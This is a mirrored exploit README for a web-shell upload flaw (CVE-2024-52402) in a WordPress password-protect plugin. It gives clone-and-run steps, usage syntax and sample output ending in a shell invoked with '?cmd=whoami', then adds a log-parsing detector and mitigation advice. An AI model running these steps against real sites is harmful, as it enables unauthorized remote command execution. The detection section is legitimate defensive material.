## https://sploitus.com/exploit?id=2C4D395B-1EF0-5F7B-9B57-544D7DFAB98C
# 🚀 Exploit for CVE-2024-52402: WordPress Exclusive Content Password Protect Plugin <= 1.1.0

## πŸ›‘οΈ Overview

This exploit targets a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress Exclusive Content Password Protect plugin, versions up to and including 1.1.0. This vulnerability allows an attacker to upload a web shell to the web server, leading to potential remote code execution.

### 📅 Details

- **Published:** 2024-11-19
- **CVE ID:** CVE-2024-52402
- **Plugin Version:** Exclusive Content Password Protect <= 1.1.0
- **Severity:** CRITICAL (CVSS 9.6)


## βš™οΈ Usage

To exploit this vulnerability, you need to provide the target WordPress site URL and a valid WordPress username and password. The exploit script logs in to the WordPress site and attempts to upload a web shell.

### 🔧 Command

```sh
python CVE-2024-52402.py -u <target> -un <username> -p <password>
```

### πŸ› οΈ Options

```
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

### 🌟 Example

```sh
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
```

## 🚀 Output Example

```sh
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
```

## 📜 Description

This script exploits the CSRF vulnerability in the Exclusive Content Password Protect plugin to upload a web shell to the WordPress server. However, it does not execute a CSRF attack directly; instead, it focuses on leveraging the plugin's file upload functionality to achieve exploitation.

## 👨‍💻 How to Run the Script

1. **Clone the Repository**
   ```sh
   git clone https://github.com/Nxploited/CVE-2024-52402.git
   cd CVE-2024-52402
   ```

2. **Install Requirements**
   Ensure you have the `requests` library installed:
   ```sh
   pip install requests
   ```

3. **Run the Script**
   Use the following command to execute the script:
   ```sh
   python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
   ```

## πŸ›‘οΈ Mitigation

To mitigate this vulnerability, update the Exclusive Content Password Protect plugin to the latest version where this issue has been fixed.
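Beyond patching, the output example above gives a defender a concrete detection signal: the uploaded shell lives under `wp-content/uploads/` and is invoked as a `.php` file with a `cmd` query parameter. The following is an added example (not part of the Nxploit repository) that parses combined-format web server access logs and flags any request for a server-side script below `wp-content/uploads/`, a directory WordPress uses only for media. The log lines are constructed for this example; the path `nxploit.php` is taken from the README's output, and the regex also generalizes to other script extensions such as `.phtml`.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (Apache/nginx "combined" format) used as
# offline input for this example; they are not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Nov/2024:10:01:02 +0000] "GET /wordpress/wp-content/uploads/2024/11/photo.jpg HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2024:10:01:10 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 84 "-" "python-requests/2.31"
203.0.113.5 - - [19/Nov/2024:10:01:11 +0000] "GET /wordpress/wp-content/uploads/nxploit.php?cmd=whoami HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.7 - - [19/Nov/2024:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2024/11/notes.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2024:10:02:05 +0000] "GET /wordpress/wp-content/uploads/nxploit.php?cmd=id HTTP/1.1" 200 40 "-" "curl/8.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# WordPress stores media under wp-content/uploads and never legitimately serves
# PHP from it, so any script request below that directory is worth an alert.
# The extension list generalizes beyond the .php file named in the README.
UPLOADS_SCRIPT_RE = re.compile(
    r'/wp-content/uploads/.*\.(php|phtml|php\d)(\?|$)', re.IGNORECASE
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_uploads_script_hits(log_text: str) -> List[Dict[str, str]]:
    """Return every parsed request whose path is a script under wp-content/uploads."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crash on them
        if UPLOADS_SCRIPT_RE.search(rec["path"]):
            hits.append(rec)
    return hits


def summarise_by_source(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged requests per client IP, to see who is driving the shell."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    flagged = find_uploads_script_hits(SAMPLE_LOG)
    for rec in flagged:
        print(f"[!] {rec['ts']} {rec['ip']} {rec['method']} {rec['path']} -> {rec['status']} ({rec['ua']})")
    print("[*] Flagged requests per source:", summarise_by_source(flagged))
```

On the constructed input the two `nxploit.php` requests are flagged and attributed to one source address, while the image and PDF downloads from the same directory are ignored. Pair this detection with a web server rule that refuses to execute PHP under `wp-content/uploads/` so that an uploaded file cannot run even if the plugin is not yet updated.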

## ⚠️ Disclaimer

This script is intended for educational purposes only. Unauthorized use of this script against systems that you do not have explicit permission to test is illegal and unethical.


***Exploit By: Nxploit, Khaled Alenazi.***